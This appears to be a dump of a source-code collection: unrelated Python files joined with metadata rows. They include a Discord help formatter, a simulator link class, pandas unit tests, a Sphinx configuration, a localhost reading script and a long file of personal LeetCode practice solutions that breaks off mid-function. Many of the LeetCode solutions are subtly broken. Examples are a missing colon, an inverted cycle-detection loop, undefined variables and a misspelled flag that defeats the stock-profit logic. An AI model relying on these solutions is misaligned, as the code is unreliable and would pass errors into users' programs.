self.paginator.add_line(f'**{cog.qualified_name} {self.commands_heading}**')
for command in filtered:
self.add_subcommand_formatting(command)
note = self.get_ending_note()
if note:
self.paginator.add_line()
self.paginator.add_line(note)
await self.send_pages()
async def send_group_help(self, group):
self.add_command_formatting(group)
filtered = await self.filter_commands(group.commands, sort=self.sort_commands)
if filtered:
note = self.get_opening_note()
if note:
self.paginator.add_line(note, empty=True)
self.paginator.add_line(f'**{self.commands_heading}**')
for command in filtered:
self.add_subcommand_formatting(command)
note = self.get_ending_note()
if note:
self.paginator.add_line()
self.paginator.add_line(note)
await self.send_pages()
async def send_command_help(self, command):
self.add_command_formatting(command)
self.paginator.close_page()
await self.send_pages()
| 36.137676 | 133 | 0.630228 |
79545bafbf7a82d975907af756fe6ae4d1b28375 | 271 | py | Python | openvisualizer/simulator/link.py | TimothyClaeys/openvisualizer | fd934a7ce2c4a15c66280882cd1a5cc4cc987d8c | [
"BSD-3-Clause"
] | null | null | null | openvisualizer/simulator/link.py | TimothyClaeys/openvisualizer | fd934a7ce2c4a15c66280882cd1a5cc4cc987d8c | [
"BSD-3-Clause"
] | 4 | 2020-05-06T14:51:09.000Z | 2020-05-25T11:42:28.000Z | openvisualizer/simulator/link.py | TimothyClaeys/openvisualizer | fd934a7ce2c4a15c66280882cd1a5cc4cc987d8c | [
"BSD-3-Clause"
] | 1 | 2020-12-01T07:58:52.000Z | 2020-12-01T07:58:52.000Z | from typing import TYPE_CHECKING
if TYPE_CHECKING:
from multiprocessing.queues import Queue
class Link:
""" Module that describes the link quality between two motes"""
def __init__(self, pdr: int, rx: 'Queue'):
self.pdr = pdr
self.rx = rx
| 20.846154 | 67 | 0.675277 |
79545c151ee82832320cdb61ed1ecabb82c73329 | 1,786 | py | Python | _unittests/ut_df/test_dataframe_helpers_simple.py | Pandinosaurus/pandas_streaming | 03008b63545e3634290ef0c041e920d94d454ccf | [
"MIT"
] | 20 | 2017-09-23T03:23:13.000Z | 2022-02-21T09:10:48.000Z | _unittests/ut_df/test_dataframe_helpers_simple.py | Pandinosaurus/pandas_streaming | 03008b63545e3634290ef0c041e920d94d454ccf | [
"MIT"
] | 19 | 2017-09-24T17:10:39.000Z | 2021-12-29T11:02:58.000Z | _unittests/ut_df/test_dataframe_helpers_simple.py | Pandinosaurus/pandas_streaming | 03008b63545e3634290ef0c041e920d94d454ccf | [
"MIT"
] | 7 | 2018-11-09T08:15:20.000Z | 2021-09-17T07:39:44.000Z | # -*- coding: utf-8 -*-
"""
@brief test log(time=4s)
"""
import unittest
import pandas
import numpy
from pyquickhelper.pycode import ExtTestCase
from pandas_streaming.df import dataframe_unfold
from pandas_streaming.df.dataframe_helpers import hash_int, hash_str, hash_float
class TestDataFrameHelpersSimple(ExtTestCase):
def test_unfold(self):
df = pandas.DataFrame([dict(a=1, b="e,f"),
dict(a=2, b="g"),
dict(a=3)])
df2 = dataframe_unfold(df, "b")
exp = pandas.DataFrame([dict(a=1, b="e,f", b_unfold="e"),
dict(a=1, b="e,f", b_unfold="f"),
dict(a=2, b="g", b_unfold="g"),
dict(a=3)])
self.assertEqualDataFrame(df2, exp)
# fold
folded = df2.groupby('a').apply(lambda row: ','.join(
row['b_unfold'].dropna()) if len(row['b_unfold'].dropna()) > 0 else numpy.nan)
bf = folded.reset_index(drop=False)
bf.columns = ['a', 'b']
self.assertEqualDataFrame(df, bf)
def test_hash_except(self):
self.assertRaise(lambda: hash_int(0.1, 3),
ValueError, "numpy.nan expected")
r = hash_int(numpy.nan, 3)
self.assertTrue(numpy.isnan(r))
self.assertRaise(lambda: hash_str(0.1, 3),
ValueError, "numpy.nan expected")
r = hash_str(numpy.nan, 3)
self.assertTrue(numpy.isnan(r))
self.assertRaise(lambda: hash_float("0.1", 3), TypeError, "isnan")
r = hash_float(numpy.nan, 3)
self.assertTrue(numpy.isnan(r))
r = hash_str("3", 100)
self.assertLess(len(r), 100)
if __name__ == "__main__":
unittest.main()
| 33.074074 | 90 | 0.553751 |
79545c51506d256eebead2a69e5dce132987671c | 5,951 | py | Python | docs/conf.py | SlicerProstate/SlicerPIRADS | b160dc547a955f2d20f52b7247d39d4de21eaa8e | [
"BSD-3-Clause"
] | null | null | null | docs/conf.py | SlicerProstate/SlicerPIRADS | b160dc547a955f2d20f52b7247d39d4de21eaa8e | [
"BSD-3-Clause"
] | 8 | 2018-03-19T14:18:15.000Z | 2018-08-02T20:45:15.000Z | docs/conf.py | SlicerProstate/SlicerPIRADS | b160dc547a955f2d20f52b7247d39d4de21eaa8e | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.join(os.path.abspath('../SlicerPIRADS')))
from mock import Mock as MagicMock
class Mock(MagicMock):
@classmethod
def __getattr__(cls, name):
return Mock()
def __mul__(self, other):
return Mock()
def __rmul__(self, other):
return Mock()
def __pow__(self, other):
return Mock()
def __div__(self, other):
return Mock()
def __add__(self, other):
return Mock()
def __radd__(self, other):
return Mock()
MOCK_MODULES = ['vtk', 'SegmentEditor']
for mod_name in MOCK_MODULES:
sys.modules[mod_name] = Mock()
autodoc_mock_imports = ['qt', 'DICOMLib', 'slicer', 'vtk.vtkCommand.UserEvent', 'ctk', 'SimpleITK', 'sitkUtils',
'qSlicerMultiVolumeExplorerModuleWidget', 'qSlicerMultiVolumeExplorerModuleHelper',
'SlicerDevelopmentToolboxUtils', 'DICOMQIICRXLoaderPlugin', 'SlicerLayoutButtons']
# -- Project information -----------------------------------------------------
project = u'SlicerPIRADS'
copyright = u'2018, Christian Herz (SPL), Andrey Fedorov (SPL)'
author = u'Christian Herz (SPL), Andrey Fedorov (SPL)'
# The short X.Y version
version = u''
# The full version, including alpha/beta/rc tags
release = u'0.1'
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinxcontrib.napoleon'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = ['Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'SlicerPIRADSdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'SlicerPIRADS.tex', u'SlicerPIRADS Documentation',
u'Christian Herz (SPL), Andrey Fedorov (SPL)', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'slicerpirads', u'SlicerPIRADS Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'SlicerPIRADS', u'SlicerPIRADS Documentation',
author, 'SlicerPIRADS', 'One line description of project.',
'Miscellaneous'),
]
# -- Extension configuration ------------------------------------------------- | 31.321053 | 112 | 0.658713 |
79545df342f8d31fe948ee54ee86bbfe38a41753 | 307 | py | Python | test/run_all_tests.py | dchampion/crypto | 1d48e84fd14bbb489c53296e145c1dee10c4d39c | [
"MIT"
] | null | null | null | test/run_all_tests.py | dchampion/crypto | 1d48e84fd14bbb489c53296e145c1dee10c4d39c | [
"MIT"
] | null | null | null | test/run_all_tests.py | dchampion/crypto | 1d48e84fd14bbb489c53296e145c1dee10c4d39c | [
"MIT"
] | null | null | null | import dh_test
import euclid_test
import primes_test
import rsa_test
import util_test
def main():
print("Running all tests...")
dh_test.main()
euclid_test.main()
primes_test.main()
rsa_test.main()
util_test.main()
print("all tests passed")
if __name__ == "__main__":
main() | 18.058824 | 33 | 0.684039 |
79545f4e0b96697e4cb43fc7ad9e993e39ab3078 | 439 | py | Python | tools/remoteaccess/tests/03-read.py | zxpower/MansOS | 1130f54357649eb25020951951d9a5963e755c66 | [
"MIT"
] | 10 | 2015-10-14T12:35:50.000Z | 2022-02-20T12:24:36.000Z | tools/remoteaccess/tests/03-read.py | zxpower/MansOS | 1130f54357649eb25020951951d9a5963e755c66 | [
"MIT"
] | 13 | 2015-11-24T03:25:08.000Z | 2017-02-08T09:15:45.000Z | tools/remoteaccess/tests/03-read.py | zxpower/MansOS | 1130f54357649eb25020951951d9a5963e755c66 | [
"MIT"
] | 7 | 2015-10-15T07:53:52.000Z | 2020-12-15T00:15:49.000Z | #!/usr/bin/env python
# Get data
import os, sys, time
import urllib2
def main():
host = "http://localhost:30001/read?port=/dev/ttyUSB0"
# host = "http://10.0.0.1:30001/read?port=/dev/ttyUSB0"
try:
req = urllib2.urlopen(host)
print("Reply data:")
print(req.read())
except Exception as e:
print("exception occurred:")
print(e)
return 1
if __name__ == '__main__':
main()
| 19.954545 | 58 | 0.587699 |
79545fcc9e9aac696bc8f6fc6290c65301ce3933 | 91,085 | py | Python | Ninja/leetcode.py | cyandterry/Python-Study | b40e6c4db10da417e72247f61146f7570621106a | [
"MIT"
] | 61 | 2015-02-03T20:25:55.000Z | 2021-05-17T19:33:40.000Z | Ninja/leetcode.py | cyandterry/Python-Study | b40e6c4db10da417e72247f61146f7570621106a | [
"MIT"
] | null | null | null | Ninja/leetcode.py | cyandterry/Python-Study | b40e6c4db10da417e72247f61146f7570621106a | [
"MIT"
] | 37 | 2015-02-04T07:12:52.000Z | 2020-05-16T18:47:16.000Z | #!/usr/bin/env python
# 1.Single Number
# Fuck!!! use XOR
def single_number(num_list):
for num in num_list[1:]
if num is not None:
num_list[0] ^= num
return num_list[0]
# 2. Maximum depth of binary tree
def maximum_depth(root):
if root is None:
return 0
return max( maximum_depth(root.left), maximum_depth(root.right)) + 1
# 3. Same Tree
def is_same_tree(p, q):
# p q are both None so same
if p is None and q is None:
return True
# one of the node is None but the other is not, not same
if p is None or q is None:
return False
if p.data != q.data:
return False
return is_same_tree(p.left, q.left) and is_same_tree(p.right, q.right)
# 4.Reverse Integer
def reverse(x):
if x < 0:
return (-1) * reverse( (-1) * x)
res = 0
while x > 0:
res = res*10 + x%10
x /= 10
return res
def reverse_int(num):
# Need to check negative, last digit zero
is_nagative = 1
if num < 0:
is_nagative = -1
digit_list = []
num = abs(num)
while num > 0:
digit_list.append(num%10)
num /= 10
result = 0
weight = len(digit_list)-1
for digit in digit_list:
result += digit * (10**weight)
weight -= 1
result *= is_nagative
return result
# 5. Unique Binary Search tree
def unique_bst(num):
if num <=1:
return num
return unique_bst_helper(1, num)
def unique_bst_helper(start, end):
if start >= end:
return 1
result = 0
for i in range(start, end+1):
# sum the result on the left ande on the right
result += unique_bst_helper(start, i-1) * unique_bst_helper(i+1, end)
return result
# 6. Best time to buy and sell
def stock_buy_sell(stock_list):
pre_price = stock_list[0]
buy_price = stock_list[0]
stock_empty = True
profit = 0
for i in range(1, len(stock_list)):
# price decreasing, sell at previous point
if stock_list[i] < pre_price:
if stock_empty:
# we got a lower buy price
buy_price = stock_list[i]
else:
profit += pre_price - buy_price
stock_empty = True
# stock increasing, stock empty false
else:
stack_empty = False
pre_price = stock_list[i]
# last sell
if not stock_empty:
profit += pre_price - buy_price
# 7. Linked List Cycle
def list_cycle(head):
slow = head
fast = head
while slow != fast:
slow = slow.next
fast = fast.next.next
fast = head
while slow != fast:
slow = slow.next
fast = fast.next
return fast
# 8. BT Inorder traversal
# Iterative way
def inorder_traversal(root):
stack = []
res = []
current = root
while current is not None or len(stack)>0:
if current is not None:
stack.append(current)
current = current.left
elif len(stack)>0:
current = stack.pop()
res.append(current.val)
current = current.right
return res
def inorder_traversal(root):
if root is None:
return
inorder_traversal(root.left)
print root.data
inorder_traversal(root.right)
# 9. BT Preorder traversal
# Iterative way
def preorder_traversal(root):
stack = []
current = root
while current is not None or len(stack)>0:
if current is not None:
res.append(current.val)
stack.append(current)
current = current.left
elif len(stack)>0:
current = stack.pop()
current = current.right
return res
def preorder_traversal(root):
if root is None:
return
print root.data
preorder_traversal(root.left)
preorder_traversal(root.right)
# 10. Populate Next right poiters in each node
# This is a bit hard to think
def next_right_pointer(root):
if root is None:
return
if root.left is not None:
root.left.next = root.right
if root.right is not None and root.next is not None:
root.right.next = root.next.left
next_right_pointer(root.left)
next_right_pointer(root.right)
"""
Need to validate if this is correct
def next_right_pointer(root):
if root is None:
return
left = root.left
right = root.right
if left is not None and right is not None:
left.next = right
while left.right is not None:
left = left.right
right = right.left
left.next = right
next_right_pointer(root.left)
next_right_pointer(root.right)
"""
# Not using recursive, but also using extra space, so not a good result
def next_right_pointer(root):
if root is None:
return
prev = [root,]
while len(prev) > 0:
current = []
for i in range(1, len(prev)):
prev[i-1].next = prev
if node.left is not None:
current.append(node.left)
if node.right is not None:
current.append(node.right)
prev[-1].next = None
prev = current[:]
return root
# 11. Search Insert Position
# This is a O(n) method, need to think about something for O(log(n))
def searchInsert(A, target):
start = 0
end = len(A) - 1
while start <= end:
mid = (start + end) / 2
if A[mid] == target:
return mid
elif A[mid] < target: # need to search second half
start = mid + 1
else:
end = mid - 1
return start
# Too easy way, not the way wanted
def searchInsert_2(A, target):
for i, num in enumerate(A):
if target <= num:
return i
return len(A)
"""
Guess these two are not the best ways
def search_insert_position_1(num_list, num):
i = 0
while i <= len(num_list)-1:
if num <= num_list[i]:
return i
i += 1
return i
# No need to use recursive
def search_insert_position(num_list, num, start, end):
if start > end:
return start
mid = (start + end) / 2
if num_list[mid] == num:
return mid
elif num_list[mid] > num:
return search_insert_position(num_list, num, start, mid-1)
else:
return search_insert_position(num_list, num, mid+1, end)
"""
# 12. Remove Duplicates from Sorted List:
def deleteDuplicates(self, head):
if head is None or head.next is None:
return head
current = head
while current.next is not None:
if current.val == current.next.val:
current.next = current.next.next
else:
current = current.next
return head
"""
No need to use prev
def remove_duplicates(head):
if head is None or head.next is None:
return head
prev = head
current = head.next
while current is not None:
if prev.data == current.data:
prev.next = current.next
else:
prev = current
currnet = current.next
return head
"""
# 13. Climbing Stairs
# Fuck you remember the num <= 2
# There's a way not to use recursive
def climb_stairs(num):
if num <= 2:
return num
return climb_stairs(num-1) + climb_stairs(num-2)
# 14. Maximum Subarray
# important is the way to think this shit!!!
def maximum_subarray(array):
sum = 0
max = MIN_INT
for i in range(0, len(array)):
sum += array[i]
if sum >= max:
max = sum
if sum < 0:
sum =0
return max
# dp way
# dp[i] = max(A[i], dp[i-1]+A[i])
# Note here it's A[i] not dp
# Because we don't need to store dp[i], so simplify to dp
def maxSubArray_2(self, A):
res = A[0]
dp = A[0]
for num in A[1:]:
dp = max(num, dp+num)
res = max(res, dp)
return res
# 15. Roman to Integer
def roman_2_integer(roman):
roman_map = { 'I': 1,
'V': 5,
'X': 10,
'L': 50,
'C': 100,
'D': 500,
'M': 1000,
}
result = 0
for i in range(0, len(roman)):
if i > 0 and roman_map[roman[i]] > roman_map[roman[i-1]]:
result += roman_map[roman[i]] - 2 * roman_map[roman[i-1]]
else:
result += roman_map[roman[i]]
return result
# 16 Single Number II
# Check later
def single_number_2(num_list, num):
one = 0
two = 0
three = 0
for i in num_list:
two |= one & num_list[i];
one ^= num_list[i];
three = one & two;
one &= ~three;
two &= ~three;
return one
# 17 Remove Element
def remove_element(A, elem):
i = 0
for j, num in enumerate(A):
if num != elem:
A[i] = A[j]
i += 1
return i
# 18 Integer to Roman
# WOCAONIMA
def integer_2_roman(num):
digits = [(1000, 'M'), (900, 'CM'), (500, 'D'), (400, 'CD' ),
(100, 'C'), (90, 'XC'), (50, 'L'), (40, 'XL'),
(10, 'X'), (9, 'IX'), (5, 'V'), (4, 'IV'), (1, 'I')]
result = ""
for digit in digits:
while num >= digit[0]:
result += digit[1]
num -= digit[0]
if num == 0:
break
return result
"""
def integer_2_roman(num):
digits = [(1000, 'M'), (900, 'CM'), (500, 'D'), (400, 'CD' ),
(100, 'C'), (90, 'XC'), (50, 'L'), (40, 'XL'),
(10, 'X'), (9, 'IX'), (5, 'V'), (4, 'IV'), (1, 'I')]
result = ""
while len(digits) > 0:
(val, romn) = digits[0] # Unpacks the first pair in the list
if n < val:
digits.pop(0) # Removes first element
else:
n -= val
result += romn
return result
"""
# 19 Merge two sorted list
# Wo dou bu xiang xiang le
# Using dummy make life easier
def mergeTwoLists(l1, l2):
dummy = ListNode(0)
cur = dummy
while l1 is not None and l2 is not None:
if l1.val < l2.val:
cur.next = l1
l1 = l1.next
else:
cur.next = l2
l2 = l2.next
cur = cur.next
if l1 is not None:
cur.next = l1
if l2 is not None:
cur.next = l2
return dummy.next
"""
def merge_sorted_list(list1, list2):
head = None
prev = None
while list1 is not None and list2 is not None:
if head is None:
if list1.data < list2.data:
head = Node(list1.data)
list1 = list1.next
else:
head = Node(list2.data)
list2 = list2.next
prev = head
else:
if list2 is None or list1.data < list2.data:
new = Node(list1.data)
list1 = list1.next
else:
new = Node(list2.data)
list2 = list2.next
prev.next = new
prev = new
return head
"""
# 20. Balanced Binary Tree
# need to check if there's a better way
def balanced_bt(root):
if root is None:
return True
if abs(get_height(root.left) - get_height(root.right)) > 1:
return False
return balanced_bt(root.left) and balanced_bt(root.right)
def get_height(root):
if root is None:
return 0
else:
return max(get_height(root.left), get_height(root.right)) + 1
# 21. Convert sorted array to bst
def array_to_bst(num_list):
if num_list is None:
return None
return array_to_bst(num_list, 0, len(num_list)-1)
def array_to_bst_helper(num_list, start, end):
if start > end:
return
mid = (start + end) / 2
n = treeNode(num_list[mid])
n.left = array_to_bst_helper(num_list, start, mid - 1)
n.right = array_to_bst_helper(num_list, mid + 1, end)
return n
# 22. Remove Duplicates from sorted array
# Remember i+1, also don't forget length check
def removeDuplicates_2(A):
if len(A) <= 1:
return len(A)
i = 0
for j in range(1, len(A)):
if A[i] != A[j]:
A[i+1] = A[j]
i += 1
return i+1
"""
# Fuck remember it is length + 1 !!!!
def remove_duplicates_in_array(num_list):
length = 0
for i in range(1, len(num_list)):
if num_list[i] != num_list[length]:
length += 1
num_list[length] = num_list[i]
return length + 1
"""
# 23. Pascal's Triangle
# Fuck notice it's range(n-1) not n
def generate_1(numRows):
res = []
for j in range(numRows):
current = [1]
for i in range(1, j):
current.append(res[-1][i]+res[-1][i-1])
if j>=1:
current.append(1)
res.append(current[:])
return res
"""
def pascal_triangle_2(n):
if n == 1:
return [1]
prev = [1]
result = [prev, ]
for i in range(n-1):
prev_copy = prev[:]
prev_copy.append(0)
prev_copy.insert(0,0)
new_line = []
# first and last num always assume 0
for i in range(1, len(prev_copy)):
new_line.append(prev_copy[i] + prev_copy[i-1])
result.append(new_line)
prev = new_line
return result
# New way to think about this. Not appending 0 at beginning but append 1, and sum every other besides last one
# this is the fucking best way to do this
def pascal_triangle(n):
if n == 1:
return [1]
prev = [1]
result = [prev,]
for i in range(n-1):
new_line = []
# appen first 1
new_line.append(1)
for j in range(1, len(prev)):
new_line.append(prev[j] + prev[j-1])
# append last 1
new_line.append(1)
result.append(new_line)
prev = new_line
return result
"""
# 24. Merge sorted array
# code will be cleaner if pthon has --
def merge_sorted_array(l1, l2):
end = len(l1) + len(l2) - 1 # this will be the new end
end_1 = len(l1) - 1
end_2 = len(l2) - 1
while end_1 >= 0 and end_2 >= 0:
if l1[end_1] >= l2[end_2]:
l1[end] = l1[end_1]
end_1 -= 1
else:
l1[end] = l2[end_2]
end_2 -= 1
end -= 1
# if end_1 hit 0, then it's done. so only possibility is end_2 not hit zero
while end_2 >= 0:
l1[end] = l2[end_2]
end -= 1
end_2 -= 1
return l1
# 25. Swap Nodes in Pairs
def swap_nodes(head):
while head is not None and head.next is not None:
temp = head.data
head.data = head.next.data
head.next.data = temp
head = head.next.next
class Node:
def __init__(self, data):
self.data = data
self.next = None
def print_list(head):
while head is not None:
print head.data
head = head.next
# 26. Symmetric Tree
def symmetric_tree(root):
if root is None:
return True
return is_symetric(root.left, root.right)
def is_symmetric(p, q):
if p is None and q is None:
return True
elif p is None or q is None or p.data != q.data:
return False
else:
return is_symmetric(p.left, q.right) and is_symmetric(p.right, q.left)
# Iterative way
def isSymmetric_2(root):
if root is None:
return True
queue = collections.deque()
queue.append(root.left)
queue.append(root.right)
while len(queue)>0:
t1 = queue.popleft()
t2 = queue.popleft()
if t1 is None and t2 is None:
continue
if t1 is None or t2 is None or t1.val != t2.val:
return False
queue.append(t1.left)
queue.append(t2.right)
queue.append(t1.right)
queue.append(t2.left)
return True
# 27. Gray Code
def grayCode(n):
i = 0
ret = []
while i < 2**n:
ret.append(i>>1^i)
i += 1
return i
# This is better than below one which is easier to remember,
# But this question, we want int instead of string binary
def grayCodeGen(n):
if n == 1:
return ['0', '1']
else:
ret = []
code_list = grayCodeGen_2(n-1)
for code in code_list:
ret.append('0' + code)
for code in code_list[::-1]:
ret.append('1' + code)
return ret
# A easy understandable way to solve this
def graycode(numbits, reverse = False):
if numbits == 1:
if reverse:
yield "1"
yield "0"
else:
yield "0"
yield "1"
else:
if reverse:
# all the "1"s start first
gcprev = graycode(numbits - 1, False)
for code in gcprev:
yield "1" + code
gcprev = graycode(numbits - 1, True)
for code in gcprev:
yield "0" + code
else:
# all the "0" start first
gcprev = graycode(numbits - 1, False)
for code in gcprev:
yield "0" + code
gcprev = graycode(numbits - 1, True)
for code in gcprev:
yield "1" + code
# 84. N-Queens
def n_queens(n):
pass
def is_valid(result, r):
for i in range(r):
if result[i] == result[r] or abs((result[i]-result[r]) - (i-r)) == 0:
return False
return True
# 28. N-Queens II
def n_queens_ii():
pass
# 29. Sort Colors
# Passing only once
def sort_colors(A):
index = 0
red_index = 0
blue_index = len(A) - 1
while index <= blue_index:
if A[index] == 0: # red
swap(A, index, red_index)
index += 1
red_index += 1
elif A[index] == 2: # blue
swap(A, index, blue_index)
index += 1 # Remember this index won't increase
blue_index -= 1
else:
index += 1
return A
# Passing twice
def sort_colors(list):
counter = [0] * 3
for i in list:
if i == 0:
counter[0] += 1
elif i == 1:
counter[1] += 1
else:
counter[2] += 1
result = [0] * counter[0] + [1] * counter[1] + [2] * counter[2]
return result
# 30. Binary Tree Level Order Traversal II
# Note: this returns a stack, in order to return a reverse one, still need to reverse them
def bt_level_traversal_ii(root):
if root is None:
return
# Use pop() to pop the result later
stack = [[root,],]
prev = [root,]
current = []
while len(prev) > 0:
for node in prev:
if node.left is not None:
current.append(node.left)
if node.right is not None:
current.append(node.right)
if len(current) > 0:
stack.append(current)
prev = current
current = []
return stack
# 31. Permutations
# Need to fucking remember this. Divide and Conquer
def permute(num):
if not num:
return [[]]
else:
res = []
for i, e in enumerate(num):
rest = num[:i] + num[i + 1:]
rest_perms = permute(rest)
for perm in rest_perms:
res.append( perm + [e,])
return res
# 32. Generate Parentheses
# With simpler implementation
def generateParenthesis(n):
ret = []
generateParenthesis_helper(n, n, '', ret)
return ret
def generateParenthesis_helper(left, right, res, ret):
if left == 0 and right ==0:
ret.append(res[:])
return
if left > 0:
generateParenthesis_helper(left-1, right, res+'(', ret)
if right > left:
generateParenthesis_helper(left, right-1, res+')', ret)
"""
def parentheses_gen(n):
res = []
cand = ''
gp(n, n, cand, res)
return res
def gp(left, right, cand, res):
if left > right or left < 0:
return
elif left == 0 and right == 0:
res.append(cand)
else:
gp(left - 1, right, cand + '(', res)
gp(left, right - 1, cand + ')', res)
"""
# 33. Best time to buy and sell II
# Remember to pre check
def stock_buy_sell_I(prices):
if len(prices) < 1:
return 0
min_price = prices[0]
max_profit = prices[0]
for price in prices:
max_profit = max(max_profit, price - min_price)
min_pirce = min(min_price, price)
return max_profit
def stock_buy_sell_II(prices):
profit = 0
prev = price[0]
for price in prices[1:]:
if price >= prev: # Increasing
profit += price - prev
prev = price
return profit
"""
Wrong solution
def stock_buy_sell_III(prices):
profit_2 = [0] * 2
prev = price[0]
low_price = price[0]
for price in prices[1:]:
if price < prev: # Reached high point/decreasing, calculate profit, got new low_price
profit = low_price - prev
if prev != low_price: # Means this is the high point
profit_2 = calculate_max_2(profit, profit_2)
low_price = price
prev = price
# Need to calcualte the last one
profit_2 = calculate_max_2(prev - low_price, profit_2)
return profit_2
"""
# A little bit Dynamic Programming
# 1. in-order pass: use profit = price - min_price
# 2. back-order pass: use profit = max_price - price
def stock_buy_sell_III(prices):
n = len(prices)
m1 = [0] * n
m2 = [0] * n
max_profit1 = 0
min_price1 = prices[0]
max_profit2 = 0
max_price2 = prices[-1]
# It's O(3n) which is O(n)
for i in range(n):
max_profit1 = max(max_profit1, prices[i] - min_price1)
m1[i] = max_profit1
min_price1 = min(min_price1, prices[i])
for i in range(n):
max_profit2 = max(max_profit2, max_price2 - prices[n - 1 - i])
m2[n - 1 - i] = max_profit2
max_price2 = max(max_price2, prices[n - 1 - i])
max_profit = 0
for i in range(n):
max_profit = max(m1[i] + m2[i], max_profit)
return max_profit
# 34. Plus One
# Fuck you cheat guys
def plusOne(digits):
i = len(digits) - 1
carry = 1
while i >= 0 and carry == 1: # So many detail! No need to continue calculation if carry == 0
s = digits[i] + carry # Calculate s first
digits[i] = s % 10
carry = s / 10
i -= 1
if carry == 1: # Last check
digits.insert(0, 1)
return digits
# 35. Roatate Image
def rotate_image(matrix):
rotated = []
for j in range(len(matrix[0])):
new_row = []
for i in range(len(matrix)-1, -1, -1): # from n-1 to 0
new_row.append(matrix[i][j])
rotated.append(new_row)
return rotated
# Fuck remember this is different from the 150Ti
def link_list_cycle(head):
slow_runner = head
fast_runner = head
while fast_runner is not None and fast_runner.next is not None:
fast_runner = fast_runner.next
slow_runner = slow_runner.next
if fast_runner == slow_runner:
return True
return False
# 36. Linked List Cycle II
# Remember to set slow = head.next and fast = head.next.next before entering the loop
def link_list_cycle_II():
if head is None or head.next is None:
return None
slow = head.next
fast = head.next.next
while slow!=fast:
if fast is None or fast.next is None:
return None
slow = slow.next
fast = fast.next.next
fast = head
while slow!=fast:
slow = slow.next
fast = fast.next
return slow
# 37. Unique Path
def unique_path(m,n):
if (m, n) == (0,0):
return 0
elif (m, n) in [(1,0), (0,1)]:
return 1
elif m == 0:
return unique_path(m, n-1)
elif n == 0:
return unique_path(m-1,n)
else:
return unique_path(m-1,n) + unique_path(m, n-1)
def unique_path_ii(map, m, n):
if (m, n) == (0,0):
return 0
elif (m,n) in [(1,0),(0,1)]:
return 1
else:
if not valid_point(map, m-1, n) and not valid_point(map, m, n-1): # No where to go
return 0
elif valid_point(map, m-1, n) and valid_point(map, m, n-1): # Can go both directions
return unique_path_ii(map, m-1, n) + unique_path_ii(map, m, n-1)
else: # Can only go one direction
if valid_point(map, m-1, n):
return uniqe_path_ii(map, m-1, n)
else:
return unique_path_ii(map, m, n-1)
def valid_point(map, m, n):
if m < 0 or n < 0:
return False
if map[m][n] == 1:
return False
return True
# This solution may look a bit stupid
# 38. Binary Tree Postorder Traversal
# Doing in iterative way
def bt_post_traversal(root):
stack = [root]
output = []
while len(stack)>0:
node = stack.pop()
output.append(node.val)
if node.left is not None:
stack.append(node.left)
if node.right is not None:
stack.append(node.right)
return output[::-1]
# Doing recursive is trivial
def bt_post_traversal(root):
if root is None:
return
bt_post_traversal(root.left)
bt_post_traversal(root.right)
print root.data
# Any pre/in/post-order tree traversal are all dfs which use stack
# 39. Binary Tree Level Order Traversal
def levelOrder(root):
res = []
if root is None:
return res
queue = []
level = []
queue.append(root)
queue.append(None)
while len(queue)>0:
node = queue.pop(0)
if node is None:
res.append(level[:])
level = []
if len(queue)>0:
queue.append(None)
else:
level.append(node.val)
if node.left is not None:
queue.append(node.left)
if node.right is not None:
queue.append(node.right)
return res
"""
The problem here is we want a result in int, but not copy the node
def bt_level_order_traversal(root):
if root is None:
return []
result = [[root]]
current = []
prev = [root,]
while len(prev):
for node in prev:
if node.left is not None:
current.append(node.left)
if node.right is not None:
current.append(node.right)
if len(current) > 0:
result.append(current)
